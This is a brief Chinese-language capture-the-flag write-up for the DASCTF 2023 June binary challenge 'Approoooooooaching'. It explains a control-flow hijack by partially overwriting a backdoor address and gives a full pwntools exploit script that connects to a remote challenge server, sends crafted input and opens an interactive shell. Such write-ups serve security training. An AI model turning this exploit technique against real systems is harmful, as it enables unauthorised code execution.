DASCTF 2023六月挑战赛 二进制专项 Approoooooooaching

DASCTF 2023六月挑战赛 二进制专项 Approoooooooaching

控制v3减少4，然后控制case6，输入数据，就可以改程序流程了，做得很莫名其妙
输入后门的低字节即可

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './bf'

li = lambda x : print('\x1b[01;38;5;214m' + str(x) + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + str(x) + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 1
if debug:
    r = remote('139.155.140.235', 9999)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def dbgg():
    raw_input()

menu = 'Give me your choice: \n'

def add(size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('size: ', str(size))

def edit(content):
    r.sendlineafter(menu, '2')
    r.sendafter('text: ', content)

def delwith():
    r.sendlineafter(menu, '3')

def exe():
    r.sendlineafter(menu, '4')

dbgg()

add(0x20)

p1 = 'i' * 4 + 'y' * 4
edit(p1)
delwith()
exe()
r.send('\xDD')
r.send('\xDD')

r.interactive()